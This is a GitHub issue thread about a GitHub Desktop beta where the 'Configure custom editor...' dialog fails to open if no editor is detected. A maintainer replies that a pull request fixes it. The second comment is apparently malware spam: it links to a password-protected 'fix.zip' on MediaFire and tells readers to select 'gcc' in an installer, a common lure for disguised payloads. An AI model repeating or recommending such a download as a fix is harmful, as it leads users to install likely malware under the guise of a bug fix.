### ISSUE TITLE
Configure custom editor... dialog not opening without an editor found

### ISSUE THREAD

**Issue by Cedric-Ab** [desktop/desktop#19162]
### The problem

When GitHub Desktop doesn't find an editor, it doesn't open the "Configure custom editor..." dialog to specify the exe path etc
You can select it, but it doesn't open the dialog

![image](https://github.com/user-attachments/assets/096a614b-078e-4fcc-a240-5a45c8c2abb7)

### Release version

Version 3.4.4-beta2 (x64)

### Operating system

Windows 10

### Steps to reproduce the behavior

1. Install GitHub Desktop somewhere where no editor is found
2. enjoy

**Comment by haohaohaoadsad** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by sergiou87** [comment]
Thanks for your report! This is fixed in https://github.com/desktop/desktop/pull/19160

We will deploy a new beta with it as soon as it gets merged. Sorry about that! 🙏
